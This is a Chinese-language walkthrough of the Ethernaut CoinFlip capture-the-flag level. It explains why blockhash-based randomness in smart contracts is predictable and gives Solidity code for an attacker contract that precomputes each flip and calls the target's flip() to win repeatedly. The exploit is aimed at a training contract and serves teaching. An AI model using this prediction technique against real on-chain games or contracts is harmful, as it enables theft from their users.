以太坊如何產生“隨機性”

以太坊區塊鏈上沒有真正的隨機性，只有被認為“足夠好”的隨機生成器。

開發人員目前通過在以太坊中的散列獨特性或難以篡改性的變量創建偽隨機性。此類變量的示例包括transaction timestamp， sender address， block height 。

以太坊提供兩種主要的加密散列函數，即SHA-3和較新的KECCAK256，它們對這些輸入變量的串聯字符串進行散列。

最終生成的哈希被轉換為一個大整數，然后由n修改。 這是為了得到一組離散的概率整數，在0到n的期望范圍內。

請注意，在我們的Ethernaut練習中，n = 2代表硬幣翻轉的兩面。

這種在智能合約中導出偽隨機性的方法很容容易受到攻擊。如果知道輸入的黑客可以結此猜出“隨機”結果。

這就是解決CoinFlip級別的關鍵。 在這里，確定硬幣翻轉的輸入變量對于您來說是公開的。

詳情演練

我們來創建一個惡意智能合約，檢查硬幣翻轉的結果。

只有當你正確猜到了結果時，你才能調用真實合約的翻轉（bool _guess）函數。

1、在Remix IDE中，創建一個與CoinFlip.sol相關的惡意合同：

contract hackCoinFlip {

CoinFlip public originalContract = CoinFlip（

“your instance address”）;

uint256 FACTOR = 578960446186580977117854925043439539266349923

32820282019728792003956564819968;

function hackFlip（bool _guess） public {

//TODO

}

}

2、實現hackFlip（）函數，使用與原始智能合約相同的邏輯和輸入變量來預測翻轉結果。 既然你知道blockhash和block.number，那么你就能準確預測正確的_guess。

function hackFlip（bool _guess） public {

// pre-deteremine the flip outcome

uint256 blockValue = uint256（block.blockhash（block.number-1））;

uint256 coinFlip = blockValue / FACTOR;

bool side = coinFlip == 1 ？ true ： false;

// If I guessed correctly， submit my guess

if （side == _guess） {

originalContract.flip（_guess）;

} else {

// If I guess incorrectly， submit the opposite

originalContract.flip（！_guess）;

}

}

3、調用你的hackFlip（）函數10次。當您做出正確的猜測時，原始智能合約的consecutiveWins計數器應該逐步增加。

關鍵安全要點

1. 沒有真的隨機性。

2. 在計算智能合約中的“隨機性”時（或者甚至從現有的隨機數庫繼承）時要格外注意。 如果您使用隨機性來確定比賽獲勝者，請記住，對手可以輕松猜出隨機結果并破解您的游戲！